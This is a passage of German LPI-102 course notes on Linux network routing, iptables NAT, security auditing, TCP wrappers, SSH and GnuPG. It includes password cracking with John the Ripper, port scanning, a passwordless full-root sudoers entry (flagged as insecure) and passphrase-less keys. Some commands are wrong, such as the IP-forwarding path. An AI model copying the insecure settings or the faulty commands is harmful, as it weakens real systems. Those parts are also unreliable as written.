  2. Erzeugen Sie einen zweiten IP-Alias auf ebendieser 1. Ethernet-Schnittstelle mit der Adresse 172.16.77.10/24.

    • ifconfig eth0:1 172.16.77.10/24

  3. Wie lauten die Netzwerk-IDs dieser beiden IP-Aliase?

    • 172.16.5.0/24

    • 172.16.77.0/24

  4. Erzeugen Sie Netzrouten zwischen den beiden neuen Netzen, als Gateway tragen Sie die eigene Maschine ein.

    • route add -net 172.16.77.0 netmask 255.255.255.0 gw 127.0.0.1

    • route add -net 172.16.5.0 netmask 255.255.255.0 gw 172.16.77.10

  5. Lassen Sie sich Ihre Routingtabelle ausgeben und notieren Sie die IP-Adresse Ihres Standardgateways. Löschen Sie danach das Standardgateway.

    • route -n

    • Erreichbarkeitskontolle über ein bestimmtes lokales Interface: ping -I 172.16.0.1 172.16.5.10

    • STD-GW: 10.23.18.1

    • Entferung mit route del default

  6. Prüfen Sie, ob Sie einen Zielserver im Internet erreichen können. Setzten Sie wieder Ihre Standardgatewayroute. Prüfen Sie abermals.

    • ping 8.8.8.8 -c3 ⇒ connect: Network is unreachable

    • Route wieder hinzufügen route add default gw 10.23.18.1

  7. Entfernen Sie abschließend die beiden IP-Aliase.

    • ifconfig eth0:0 down

    • ifconfig eth0:1 down

  8. Fügen Sie dem Skript fw-simple einen weiteren case-Zweig natonly) hinzu, der die Firewall öffnet, IP-Forwarding aktiviert und die beiden folgenden Zeilen ausführt (Bitte auf eigene Bedürfnisse anpassen, siehe auch unter Debian die Datei /etc/rc.local):

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -i eth0 -d 10.23.18.109 -p tcp --dport 222 -j DNAT   --to-destination 172.16.0.2:22
Lösung (Siehe Datei fw-simple-0.2)

Unterhalb des stop-Zweiges ist folgendes einzufügen:

natonly)
  open
  # IP-Forwarding
  echo 1 > /proc/sys/ipv4/ip_forward
  # NAT-Routing
  iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  # Port-Forwarding zu CentOS (ssh-Server)
 iptables -t nat -A PREROUTING -i eth0 -d 10.23.18.109 -p tcp --dport 222 -j DNAT --to-destination 172.16.0.2:22
  ;;

18. Topic 110.1: Perform security administration tasks

ZIEL: Systemkonfiguration in Sachen Sicherheit prüfen, dabei sollen die Richtlinien des IT-Sicherheitsbeauftragten beachtet werden

18.1. Suche nach Dateien mit Sonderrechten

Zur Motivation: Dateien mit dem SUID- und SGID-Bit können Angreifern ein Einfallstor bieten, wenn Anwendendereingabe-String nicht sauber verarbeitet werden (Buffer-Overflow!).

Klassisches Beispiel - Benutzerverwaltung:

Wozu ist beim Programm /usr/bin/passwd das SUID-Bit erforderlich?

=> Damit der einfache User sein Passwort ändern kann. Er muss die Datei '/etc/shadow'  bearbeitet können.
  • Jeweils einzeln nach den Bits fahnden:

    find / -perm -o+t
    find / -perm -1000
    find / -perm -g+s
    find / -perm -2000
    find / -perm -u+s
    find / -perm -4000
  • Mit einer einzigen Kommandozeile:

    find / -perm -1000   -o   -perm -2000   -o  -perm -4000  \
                 2> /dev/null | egrep '/tmp|wall|passwd'  | xargs ls -ld

Wieviel SUID-Dateien finden Sie auf den folgenden Systemen?

  • Debian: 30

  • CentOS: 28

  • Slitaz: 12

18.2. Nutzer-Accounts prüfen

  • Verfallszeiten ansehen: chage -l max

  • Wie sehen die Dateien /etc/shadow und /etc/passwd insbsondere in Bezug auf die Spalte 2 aus?

    • shadow: Sind zu schwache Passwörter von Usern gesetzt worden? → "john the ripper"
      darauf ansetzen sowie die beiden Pakete "libcrack2" und "libpam-cracklib" (Debian) installieren

      AUFGABE: Bitte dieses Paket auf Debian installieren und testen, ob ein
      Benutzer sich immer noch ein solch einfaches Passwort wie "12345678" setzen kann.
    • passwd: Tauchen hier sogar Klartextpasswörter auf? → Konvertierung zum Shadow-
      System: Kommando pwconv

18.3. Offene TCP/UDP-Ports finden / Netzwerkkommunikation kontrollieren

  • Nmap hat TCP-Scan voreingestellt, außerdem wird standardmäßig mit Ping die Erreichbarkeit getestet, deshalb diese Optionen (DHCP-Server-Port = 67): nmap -p 50-100 -P0 -sU proxyserver

  • Für Schnelltest: telnet proxyserver 53

  • Mittels "netcat" Ports scannen: nc -z -v 127.0.0.1 22

  • Werkzeug "socket", um Web-Clients (wget, w3m, lync, firefox, …) zu testen: socket -sl 80 (Ein listening Daemon = Server)

18.4. Ressourcenverwendung kontrollieren

  • Kommando ulimit: Environment-Eigenschaften wie z.B. der Größe von core-Files, Datengröße eines Programmes. Dabei werden Limitierungen unterschieden, die

    a) Von einer bash-Umgebung aus gestartet wurden (z.B. maximale Dateigröße mit '-f')
    b) Nicht mit einer bash zusammenhängen (z.B. max. Anzahl von User-Prozessen mit '-u') +

    + → Systemweite Konfiguration: /etc/profile oder /etc/security/limits.conf

  • Wichtige Optionen: -c <GRÖSSE> = Maximalgröße für Core-Files -d <GRÖSSE> = Maximale Datengröße für Programme -f <GRÖSSE> = Maximale Dateigröße (z.B. 4MB: ulimit -f 4000) -a = Alle gesetzten Limits ausgeben -n <ANZAHL> = Maximale Anzahl von offenen Dateien festlegen -v <GRÖSSE> = Maximale Größe des virtuellen Speichers (z.B. 500MB = 512000kB: ulimit -v 512000, Damit kann allerdings Firefox nicht mehr starten, wie mit top festgestellt, braucht er über 700 MB virtuellen speicher!)

  • Fragen zur Vertiefung

    • Was macht ulimit genau? Es kann als Shellbuiltin (Deshalb: "help ulimit") Ressourcen einschränken, dass betrifft vor allem Prozesse aber verschiedene interne Shellressourcen.

    • Was macht die Zeile ulimit -Sd $(ulimit -Hd)? Zuerst die max. Datengröße für Programme ermitteln, danach diesen Wert als Quelle für das zu letztenden Softlimit verwenden.

18.5. Offene Dateien finden

  • Historisch wichtig: fuser -mv /mnt

  • Das "neue" Kommando: lsof

    • Optionen:

      • -i → Netzwerkprotokoll angeben, z.B. lsof -iTCP

      • -n → Numerische ausgabe: IP-Adressen anstelle von Hostnamen

      • -P → Portnummern in dezimaler Form ausgeben, z.B. lsof -iTCP -P

      • -t → "knappes" Listing, dh. es werden nur die Prozess-IDs ausgegeben, nicht die weiteren Eigenschaften

      • -u <USER> Die Prozesse eines Users ausgeben

      • -c <PROGRAM> Eine Liste geöffneter Dateien eines bestimmten Programmes anzeigen (z.B.: lsof -n -c iceweasel)

      • -p <PID> Eine Liste geöffneter Dateien eines bestimmten Prozesses anzeigen: lsof -p 4185

18.6. Super User do

Ziel: Nur bestimmte, einzelne Aufgaben mit erhöhten Rechten ausführen.

  • Kommando sudo (= "Vorschalt-Kommando", das dem eingentlichen Kommando vorangestellt wird)

  • Datei: /etc/sudoers

  • Kommando zum Bearbeiten der Datei /etc/sudoers: visudo

Aufgabe: Erzeugen Sie einen Eintrag, der es allen Benutzern ermöglicht, das Kommando shutdown OHNE Passwortabfrage zu benutzen.

Tux:     sudo /sbin/shutdown -hk now
Kommando: visudo
#USER   HOST  RUNAS   TAG     COMMANDS
tux     ALL = (ALL) NOPASSWD: /sbin/shutdown

18.7. Fragen/Aufgaben zur Wiederholung

  1. Legen Sie einen Benutzer lpictest an, wobei Sie ihm als Heimatverzeichnis
    /opt/home/lpictest zuweisen. Setzen Sie ihm ein Passwort.

    mkdir /opt/home
    useradd -d /opt/home/lpictest -m lpictest
    passwd lpictest
  2. Dieser neue Benutzer ist sehr sicherheitsbewusst und setzt sich sehr oft ein neues Passwort, das er dann aber immer mal wieder vergisst. Setzen Sie dem eine Grenze; er soll frühestens nach 5 Tagen sein Passwort ändern können.

    passwd -n 5 lpictest    => alternativ:    chage -m 5 lpictest
    (Langform für beide Kommandos: '--mindays'
  3. Mit welchem Schalter von su kann man mal eben schnell eine Kommandozeile wie shutdown -h now ausführen, ohne sich erst richtig interaktiv an einem neuen Shellprompt zu befinden?

    Mit Option: '-c'   =>   su -l -c "shutdown -h now"
  4. Wie ist die Datei /etc/sudoers aufgebaut? Was bedeutet ALL? Eine einfache Erkärung ist unter https://www.gentoo.org/doc/de/sudo-guide.xml zu finden.

    • Syntax: username hostname = (runasuser) commands

    • ALL ist ein Alias, der für diese eben genannten Objkte verwendet werden kann.

  5. Erzeugen Sie unter CentOS Linux einen Eintrag mit Hilfe von visudo im Abschnitt User priviledge specification, der es dem Nutzer tux gestattet, ohne Passworteingabe alle möglichen administrativen Aufgaben durchzuführen.

    tux ALL = (ALL) NOPASSWD: ALL
    grep -v ^# /etc/sudoers | grep -v ^$ | tail -3
       root       ALL=(ALL)       ALL
       tux        ALL=(ALL)       NOPASSWD: ALL
       %wheel     ALL=(ALL)       ALL
    HINWEIS: In Sachen Sicherheit ist dies freilich keine gute Idee, besser ist es z.B. auch
    auf Rasbian den root-Account mit 'passwd root' zu aktivieren und die Zeilen
    %sudo ALL=(ALL:ALL) ALL
    pi ALL=(ALL) NOPASSWD: ALL
    zu deaktivieren.
  6. Mit welchen beiden Kommandozeilen können Sie nachsehen, welche geöffneten Dateien es unter /proc gibt?

    fuser -mv /proc
    lsof /proc
  7. Mit welchen Optionen lassen sich bei ulimit Hard- und Softlimitierungen setzen?

    • -H

    • -S

    • Siehe help ulimit sowie ulimit -a

  8. Zwei Spielhallenbetreiber wollen ihre Netzwerke für ein gemeinsames LAN-Party-Event zusammenschalten. Es werden zwischen 400 und 500 Mitspieler erwartet. Wie muss die Netzwerkmaske verändert werden, wenn die beiden vorhandenen Netzwerk-IDs 198.67.253.0 und 198.67.254.0 lauten?

    Die neue Maske lautet /22 oder 255.255.252.0.
  9. Erweitern Sie das Firewall-Skript im start)-Zweig um die unten genannten Zeilen. Definieren Sie im Header des Skriptes eine Variable namens intnet, weisen Sie ihr den Wert 172.16.0.0/27 zu und ersetzen Sie in den iptables-Zeilen die Netzwerk-IDs durch den entsprechenden Variablenaufruf.

iptables -A FORWARD -s 172.16.0.0/27 -d any/0 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -s any/0 -d 172.16.0.0/27 -m state --state ESTABLISHED,RELATED -j ACCEPT

Lösung: Siehe Datei fw-simple-0.3.

19. Topic 110.2: Setup host security

Ziel: Absicherung und Deaktivierung von Service

Neben der althergebrachten Art, Services im standalone-Betrieb mit System-V-Dateien (/etc/inittab, im Beispiel (Debian): /etc/init.d/ssh sowie /etc/rc2.d/S02ssh) zu starten, gibt den Superserver inetd, der bei Bedarf die i.d.R. ruhenden Server startet.

Die einzelnen Komponenten und ihre Konfigurationsdateien

Aufgabe: Installieren auf dem Debian-System den vsftpd-Server, konfigurieren Sie ihn, so dass er nicht mehr standalone läuft, sondern den inetd zum Starten benötigt.

  • Datei: /etc/vsftpd.conf

  • Parameter: listen ⇒ "listen=NO"

Daneben bitte noch für lokalen User-Login die Zeilen 26 und 29 aktivieren.

Nun muss der Dienst gestoppt werden: service vsftpd stop

Im nächsten ist der inetd zu installieren/konfigurieren:

  • Installation: apt-get install openbsd-inetd

  • Konfiguration: vi /etc/inetd.conf

ftp  stream  tcp  nowait  root  /usr/sbin/vsftpd
  • Dienst starten (er läuft noch nicht, weil er keine aktive Zeile fand): service openbsd-inetd start

Jetzt folgen Tests und die Einbindung von tcpd.

  • Verbindungsaufnahme: ftp localhost

    • Zugriffsmöglichsmöglichkeiten:

      • Als Benutzer anonymous/ftp (Speicherort: /srv/ftp laut Heimatverzeichnis des Benutzers ftp, siehe /etc/passwd)

      • Als normaler Benutzer (Speicherort: $HOME)

  • Verbindungsaufnahme von verschiedenen Netzwerken aus, Ziel: nur über 172.16.0.0/29 erreichbar sein:

    • Vom Windows-Hosts aus: WIN+R: cmd ⇒ ftp 10.23.18.109 ⇐ OK (Noch!)

    • Vom CentOS aus: ftp 172.16.0.1 ⇐ Ist und bleibt OK

Aufgabe zur Vertiefung von inetd: Installieren Sie das Samba-Server-Web-UI swat mitsamt allen abhängigen Paketen. Ist bei Clientanfragen an den Port 901 etwas zu sehen? (nmap benutzen). Wie sieht die dafür verantwortliche Zeile in der /etc/inetd.conf aus?

19.1. Zugriffskontrolle mit dem TCP Wrapper (tcpd)

  • Der tcpd ist unabhängig von (x)inetd!

  • Der xinetd benötigt den tcpd nicht, er besitzt eine eigene Zugriffskontrolle

  • Wenn man den tcpd als Kontrollinstanz für den alten inetd einbinden möchte, macht man dies so:

Wichtig: Einfügen von /usr/sbin/tcpd VOR dem eigentlichen, abhängigen, zu startenden Daemon-Binary.

+ Datei /etc/inetd.conf editieren:

ftp  stream  tcp  nowait  root /usr/sbin/tcpd /usr/sbin/vsftpd

Danach muss der inetd seine Konfiguration neu einlesen:

kill -1 `cat /var/run/inetd.pid`
Alternativ:
kill -SIGHUP `cat /var/run/inetd.pid`

Es gibt zwei Konfigurationsdateien für die Zugriffskontrolle, die folgende restriktive Vorgehensweise ist allgemein empfehlenswert: Was in der hosts.allow nicht explizit erlaubt wurde, wird mittels einer abschließenden Regel in der hosts.deny verboten:

a) Zuerst wird die /etc/hosts.allow abgearbeitet:

vsftpd :  172.16.0.0/255.255.255.224
vsftpd :  10.23.18.,172.16.0.0/255.255.255.224 EXCEPT 172.16.0.3

Im zweiten Beispiel werden zwei Netzwerke zugelasssen, ausgenommen die Maschine 172.16.0.3.

Bei Verwendung von NIS-Domänen könnte man alle lokalen Hosts (via Hostnamen, in denen kein Punkt vorkommt) mit

vsftpd : LOCAL

Zugriff gewähren.

Das folgende Beispiel ist LPI-relevant, es blockiert Anfragen von *.example.com und sendet an Stelle dessen "421 Bad hacker, go away!".

vsftpd : .example.com : twist /bin/echo "421 Bad hacker, go away!"

b) Danach wird die /etc/hosts.deny abgearbeitet, Beispielinhalt für die oben beschriebene Arbeitsweise:

ALL : ALL
  • Hinweise:

    • Man-Pages: man hosts_access sowie man hosts_options ⇒ Option twist! (Debian)

    • Es muss kein Neueinlesen dieser Änderungen durchgeführt werden; der tcpd läuft nicht ständig, vielmehr wird er mit jeder neuen eingehenden Clientanfrage aktiv und arbeitet dann die Dateien ab

    • Es kann wahlweise auch nur eine der beiden Dateien verwendet werden, dann müssen Ausschlüsse mit ECEPT definiert werden.

    • Weiterführendes: http://www.softpanorama.org/Net/Network_security/TCP_wrappers/index.shtml

19.2. Benutzung von vsftpd

Anonymer Zugriff:

root@deb7:~# tail -1 /etc/passwd
ftp:x:122:133:ftp daemon,,,:/srv/ftp:/bin/false
root@deb7:~#
root@deb7:~#
root@deb7:~# echo Hallo... > /srv/ftp/willkommen.txt
root@deb7:~#
root@deb7:~# ftp localhost
ftp: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
220 (vsFTPd 2.3.5)
Name (localhost:tux): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0               9 Feb 10 11:56 willkommen.txt
226 Directory send OK.
ftp> by
221 Goodbye.
root@deb7:~#

19.3. Login für einfache Benutzer sperren

  • Das Sicherheits-Modul pam_nologin (Siehe dazu auch die gleichnamige man-Page) sorgt dafür, dass bei Vorhandensein der Datei /etc/nologin jeder Neulogin von allen Benutzern außer root verhindert wird. Die Datei einfach anlegen:

    echo "Wegen Wartungsarbeiten geschlossen." > /etc/nologin
  • Nach Beendigung der Wartungsarbeiten löscht root einfach diese Datei und alles ist wie vorher.

19.4. Fragen/Aufgaben zur Wiederholung

  1. Wie heißen die Konfigurationsdateien des alten sowie des neuen Internet-Superservers?

    • /etc/inetd.conf

    • /etc/xinetd.conf bzw. /etc/xinetd.d/*

    • Kommando zum Prüfen der Syntax: tcpdchk

  2. Wie heißen die Konfigurationsdateien des TCP-Wrappers? Listen Sie die Dateinamen gemäß ihrer Abarbeitsungreihenfolge auf.

    1. /etc/hosts.allow

    2. /etc/hosts.deny

  3. Prüfen Sie mit ldd, ob Sie das Programm /usr/sbin/sshd über den TCP-Wrapper schützen können.

    ldd `which sshd` | grep libwrap
    libwrap.so.0 => /lib/x86_64-linux-gnu/libwrap.so.0 (0x00007f12bfe1a000)
  4. Sorgen Sie mit Hilfe des TCP-Wrappers dafür, dass der SSH-Dienst unter Debian nur von Ihrem Windows-Host aus zugreifbar ist.

    • Datei /etc/hosts.allow editieren:

      sshd : 10.23.18.100
  5. Falls nicht bereits geschehen, installieren Sie auf CentOS den alten Standard-tcpd, konfigurieren Sie ihn so, dass er SSH nur aus dem Netzwerk 172.16.0.0/27 heraus zulässt.

    • Lösung 1 (Wegen Übersichtlichkeit zu bevorzugen):

      • Datei /etc/hosts.allow: sshd : 172.16.0.0/27

      • Datei /etc/hosts.deny: ALL : ALL

    • Lösung 2 (Das Ganze nur in einer Datei):

      • Datei /etc/hosts.deny: ALL : ALL EXCEPT 172.16.0.0/27

  6. Blockieren Sie den Zugang zum CentOS-System für alle Benutzer außer root, er soll ungehindert auch vom Netzwerk aus zugreifen können.

    echo "Kein Zugang" > /etc/nologin
  7. Modifizieren Sie das Firewall-Skript, indem Sie die beiden iptables-Zeilen aus den natonly)-Zweig in eine Funktion namens natrouter auslagern und sie dann an Stelle der beiden Zeilen einbinden.

    ⇒ Siehe Datei fw-sipmle-0.4

20. Topic 110.3: - Daten durch Verschlüsselung schützen

Siehe dazu:

20.1. Verschlüsselungsarten

Symmetrische Verschlüssung
  • Auf beiden Seiten ist der eine, selbe Schlüssel hinterlegt

  • Einsatz bei Pre Shared Key ⇒ WLAN

  • Schwierige Schlüsselverwaltung

  • Wichtige Verschlüsselungsverfahren: AES (WPA2 bei WLAN), Blowfish, 3DES

Asymmetrische Verschlüsselung
  • Laut Kerkhoff: Selbst wenn der Algorithmus in die Hände des Feindes fällt, dürfen keine Rückschlüsse auf den Schlüssel gezogen werden können

  • Das Schlüsselpaar besteht aus dem privaten Schlüssel, der NIEMALS das System verlassen darf, der öffentliche Schlüssel wird weitergegeben

  • Ablauf einer Verschlüsselung:

    • Der Sender verschlüsselt die Nachricht mit dem Public-Key der Empfängers

    • Der Empfänger entschlüsselt sie mit seinem eigenen Private-Key

  • Wichtige Verschlüsselungsverfahren: RSA, DH (IKE-Handshake), ECDSA (Unter Mitwirkung der NSA entstanden!), DSA

  • Risiken: Zu geringe Schlüssellänge (inbesondere bei RSA wichtig), oft kein Schutz gegen Man-In-The-Middle (MITM) Angriffe ⇒ Fingerabruck prüfen!

  • Anwendungen, die u.a. RSA verwenden: Secure Shell, Pretty Good Privacy (GnuPG)

20.2. Die Secure Shell

Bestandteile:
  • ssh (ersetzt rlogin und rsh) ⇒ Fernadministration (remote control)

  • scp (ersetzt rcp) ⇒ remote copy

  • sftp (ersetzt mit reduziertem Befehlssatz einen klassische ftpd)

20.3. Aufbau einer Vertrauensbasis

  1. Zuerst einmal wird auf dem Server der eigene krytografische Fingerabdruck vom eigenen Schlüsselpaar extrahiert, damit Clients später die Identität des Servers überprüfen können. Je nach Distribution werden unterschiedlich viele Schlüssel für die verschiedenen Verschlüsselungsalgorithmen vorgehalten:

    => ssh-keygen -l -f /etc/ssh/ssh_host_ecdsa_key.pub
    => ssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub
  2. Beim ersten Verbingsaufbau von Clients via mit ssh, scp oder sftp wird der öffentliche Schlüssel vom Server automatisch heruntergeladen und ein Fingerabruck daraus generiert, der nun mit dem Fingerabdruck, der auf dem Server ausgegeben wurde, verglichen werden muss. Stimmt er überein, Unterschreibt der Client mit yes die Echtheit der Serveridentität.
    Danach wird die IP-Adresse bzw. der Hostname des Servers zusammen mit dem eben heruntergeladenen Public-Key des Servers in der benutzerdefinierten Datei ~/.ssh/known_hosts gespeichert.

    Dieser vertrauensbildende Vorgang kann auch vom Admin durchgeführt werden, die systemweite Datenbankdatei heißt /etc/known_hosts.

  3. Der Client bestimmt, welches Verschlüsselungsverfahren angewendet wird, will er RSA für die Kommunikation, schiebt er das Ganze so an:

    ssh  -o  HostKeyAlgorithms=ssh-rsa-cert-v01@openssh.com,\
                    ssh-dss-cert-v01@openssh.com,ssh-rsa-cert-v00@openssh.com,\
                    ssh-dss-cert-v00@openssh.com,ssh-rsa,ssh-dss  tux@deb7
    (Oft funktioniert auch die Kurzform: "HostKeyAlgorithms=ssh-rsa")
  4. Die Clientseitige Datenbankdatei known_hosts kann durchsucht u. bearbeitet werden:

    1. Bei nicht gehashten Adressen/Hostnamen: grep/vi

    2. Bei gehashten Adressen/Hostnamen: ssh-keygen -F <HOST> bzw: ssh-keygen -R <HOST>

20.4. Konfiguration der Secure Shell

Serverseitig:
  • Dateiname: /etc/ssh/sshd_config (Wegen dem Daemon ist ein d im Dateinamen)

  • Eine wichtige Einstellung, die root-Login verbietet: PermitRootLogin no

  • Falls ein Login mittels eigenen Schlüsselpaaren erzwungen werden soll: PasswordAuthentication no

  • Festlegen, welche Nutzer Zugriff bekommen sollen: Parameter AllowUsers, DenyUsers, AllowGroups und DenyGroups

  • Einen Verschlüsselungsalgorithmus nicht mehr anbieten, Zeile löschen: HostKey /etc/ssh/ssh_host_ecdsa_key

Clientseitig:
  • Dateiname: /etc/ssh/ssh_config (Ohne d!)

  • Bequemlichkeitseinstellung (Der Client kann dann -X weglassen): ForwardX11 yes

  • Festlegen, dass Clients einen anderen als den voreingestellten (einkompilierten) Verschlüsselungsalgorithmus nutzen sollen: HostKeyAlgorithms ssh-rsa-cert-v01@openssh.com,… (s.o.)

20.5. Eigenes clientseitiges Schlüsselpaar erzeugen

Zur Orientierung: Das Ganze geschieht auf dem Client, er legt zum Schluss lediglich seinen öffentlichen Schlüssel unter dem Namen authorized_keys auf dem Server ab.

  • Ziele:

    • Zweifaktorauthentifizierung

    • Automatischer Login für Backup-Tools wie rdiff-backup

  • Erzeugung eines eigenen Schlüsselpaares auf dem Client (= CentOS) ohne Passphrase für Autologin

    ssh-keygen -t rsa  -b 4096  -N ""
  • Kopieren des Inhaltes von ~/.ssh/id_rsa.pub (Das ist der öffentlicher Schlüssel!) in eine Datei namens ~/.ssh/authorized_keys auf den Server

    1. Kopieren auf manuelle Art (alles auf dem Client):

      • Sicherstellen, dass es auf dem Server den Ordner ~/.ssh gibt:

        tux@client>  ssh tux@server "mkdir -p ~/.ssh"
      • Die Public-Key-Datei kopieren und umbenennen (ACHTUNG: Nur beim ersten Mal, sonst droht Datenverlust!)

        tux@client>  scp ~/.ssh/id_rsa.pub  tux@server:.ssh/authorized_keys
    2. Komfortables Kopieren ebenfalls auf dem Client):

      ssh-copy-id  tux@server
  • Tipps fürs Testen:

    • Der besseren Übersicht halber erst einmal mit gleichen Benutzernamen arbeiten: tux@clienttux@server (Entsprechend wird auf beiden Seiten automatisch /home/tux/.ssh erwartet)

    • Nach erfolgreichem Login nicht auf dem Server eingeloggt bleiben (Man will ja wahrscheinlich noch nicht wirklich den Server fernadministrieren, sondern erst einmal die Client-History zu Dokumentationszwecken sichten.):

      exit
      history 20 > ssh-versuche-histfile-01.txt

20.6. Automatisches Synchronisieren von Verzeichnissen

Motivation: Dank des eigenen passphraselosen Schlüssels kann nun leicht einen Master/Slave-Mirror eingerichtet werden. Die Synchonisierung kann später von cron ausgeführt werden.

  1. Ziel- und Quell-Verzeichnis definieren bzw. anlegen:

    1. Lokaler Ausgangspunkt: ~/Dokumente

    2. Entfernter Zielordner (auf Debian/Rasbian): mkdir /home/tux/Backup/Dokumente/

  2. Installation der Software auf beiden Seiten:

    1. Verschlüsselung via sshd (= erfüllte Voraussetzung)

    2. Vom Samba-Team stammendes rsync

  3. Ein einfacher Aufruf, der alle Dateien auf dem Server löscht, die nicht auf der sendenden Seite beim Client existieren kann so aussehen:

#rsync  ARCHIVING  MASTER/SLAVE   SENDER=CLIENT               EMPFÄNGER=SERVER
rsync     -a        --delete      ~/Dokumente/      tux@deb7:/home/tux/Backup/Dokumente/
#                                            ^
#                                            |
#                                     Wenn dieser "Directory"-Slash fehlt, wird
#                          der Ordener als Unterverzeichnis in den Zielordner kopiert!
History-Mitschnitt für Experimente

Anmerkung: Im folgenden Historyauszug ist beim ersten rsync-Aufruf (Zeile 06) weder ein Login-Prompt noch eine Ausgabe, was im Einzelnen getan wird, zu sehen. Beim zweiten Aufruf (Zeile 15) wird die Option -v (verbose) verwendet, die für den Testfall mehr Anschaulichkeit bringt.

01 [tux@cent7 ~]$ echo 123 > Dokumente/datei01.txt
02 [tux@cent7 ~]$ echo 123 > Dokumente/datei02.txt
03 [tux@cent7 ~]$ echo 123 > Dokumente/datei03.txt
04 [tux@cent7 ~]$
05 [tux@cent7 ~]$
06 [tux@cent7 ~]$ rsync -a --delete ~/Dokumente/ tux@deb7:/home/tux/Backup/Dokumente/
07 [tux@cent7 ~]$
08 [tux@cent7 ~]$
09 [tux@cent7 ~]$ ### Testen, ob das Master-Slave-Verhalten funktioniert; wird eine Datei auf dem
10 [tux@cent7 ~]$ #   Master gelöscht, zieht das eine entsprechende Löschaktion auf dem Slave nach
11 [tux@cent7 ~]$ #   sich:
12 [tux@cent7 ~]$
13 [tux@cent7 ~]$ rm Dokumente/datei01.txt
14 [tux@cent7 ~]$
15 [tux@cent7 ~]$ rsync -a -v --delete ~/Dokumente/ tux@deb7:/home/tux/Backup/Dokumente/
16 sending incremental file list
17 ./
18 deleting datei01.txt
19
20 sent 83 bytes  received 15 bytes  196.00 bytes/sec
21 total size is 8  speedup is 0.08
22 [tux@cent7 ~]$

20.7. Fragen/Aufgaben zur Wiederholung

  1. Nennen Sie die beiden Dateien (benutzerdefiniert und systemweit), die die clientseitigen Vertrauenstellungen zu ssh-Servern beinhalten.

    a) ~/.ssh/known_hosts
    b) /etc/known_hosts
  2. Wie lautet die Kommandozeile, mit der Sie sich ein eigenes ssh-Schlüsselpaar erzeugen können?

    ssh-keygen -t rsa -b 4096
  3. Welchen Namen muss die Public-Key-Datei Ihres eigenen Schlüsselpaares auf dem Server aufweisen, wenn Sie sich dort mittels dieses Paares authentifizieren wollen? (Volle Pfadangabe)

    ~/.ssh/authorized_keys
  4. Wie heißen die Konfigurationsdateien von sshd und ssh?

    /etc/ssh/sshd_config   ( D = Daemon )
    /etc/ssh/ssh_config
  5. Mit welcher Direktive kann man in der Konfigurationsdatei des sshd einen ssh-Login von root verhindern?

    PermitRootLogin no
  6. Welchen TCP-Port verwendet standardmäßig der sshd?

    22    ( siehe /etc/services )
  7. Warum kann man den sshd nicht vom Inet-Daemon starten lassen?

    Weil er sonst jedesmal beim Initiieren durch Inetd seinen Server-Key neu erzeugen müsste (Zeitaufwand!)
  8. Erweitern Sie das Firewall-Skript im Header um eine Variable extif, weisen Sie ihr den Wert eth0 zu. Fügen Sie weiterhin einen case-Zweig namens main (für "maintenance") hinzu und betten dann dort die folgenden Zeilen ein. Testen Sie als root, ob der Firewall-Router damit ins Internet kommt und Updates installieren kann.

### Lokale Prozesse via SPI erlauben
iptables -A INPUT -i $extif -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -o $extif -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT

Lösung siehe Datei fw-simple-0.5

20.8. Tunnelbau mit SSH

a) Im einfachsten Falle X11 durchtunneln (X11-Forwarding ist ansonsten unverschlüsselt!)

ssh -X  tux@cent7
=> nautilus &
=> yast2 &        (bei SuSE Linux)

b) Samba-Web-UI swat absichern:

Swat ist ein leider nicht mehr weiter gepflegter Samba-Konfigurations-Webdienst, der bei

grep swat /etc/inetd.conf
      swat   stream     tcp     nowait.400      root    /usr/sbin/tcpd  /usr/sbin/swat

→ Das Starten von swat übernimmt der Superserver…

Der Login in die Weboberfläche als root ist auf der Maschine selbst gefahrlos möglich:

http://localhost:901/

Aber Achtung:

Aber nicht via LAN einloggen!

ssh-Tunnel als einfacher Benutzer auf einem Rechner im LAN aufbauen:

ssh -L 9901:localhost:901 samba-server

Dann einfach im Webbrowser dieses Rechners die verschlüsselte Verbindung über den speziell angegebenen Port 9901 aufbauen:

http://localhost:9901

20.9. Verschlüsselung mit GnuPG

  • Schlüssel erzeugen

    gpg --gen-key    (Bestätigung am Schluss mit 'F' [fertig])
  • Public-Key exportieren

    gpg --export --armor -o axelPemmann.pub "Axel Pemmann"
  • Rückrufszertifikat erzeugen

    gpg --gen-revoke -o axelPemmann-revoke.crt "Axel Pemmann"
    BESSER: Nicht in eine Datei speichern, die verschlüsselt werden müsste, sondern                         ausdrucken!
  • Öffentlichen Schlüssel auf den FTP-Sever hochladen

    Bitte in den Ordner '/HandOuts/PemmannAxel/LPI-102' kopieren.
    Oder besser auf einen Keyserver mit `gpg --send-key ...` hochladen.
  • Fingerprint für spätere Authentizitätsprüfung ausgeben (kontra MITM)

    gpg --fingerprint  "Axel Pemmann" > axelPemmann-fingerprint.txt
  • Schlüssel der Kommunikationspartner importieren

    gpg --import gerald.pub
    gpg --import maik.pub
    gpg --keyserver certserver.pgp.com --recv-key  0x47110815
    --> oder suchen via:  http://pgp.mit.edu/
  • Die importierten Schlüssel prüfen und signieren

    gpg --edit-key gerald
    gpg> list               (Schlüssel auflisten, optional)
    gpg> fpr  gerald        (Fingerabdruck des Partners ausgeben, optional)
    <--- SNIP: Per Telefon Fingerprint vegleichen  --->
    gpg> sign                (Unterzeichnung (j))
    gpg> check
    gpg> quit
  • Eine Datei verschlüsseln

    gpg --output datei-richter.txt.gpg  --encrypt --recipient  richter  datei.txt
  • Entschlüsselung der Datei beim Partner

    gpg --decrypt  datei-pemmann.txt.gpg  [--output <DATEINAME>]
  • Heruntergeladene Dateien verifizieren

    gpg --verify source.tar.gz
  • Verschlüsselung und Archivierung mit gpg-zip (Ganze Verzeichnisse)

    gpg-zip --encrypt --output GnuPG.cryptdir --gpg-args "-r axel@pemmann.de" GnuPG/
  • Entschlüsseln und Entpacken mit gpg-zip

    cd /tmp
    gpg-zip --decrypt ~/GnuPG.cryptdir

20.10. Fragen/Aufgaben zur Vertiefung und Wiederholung

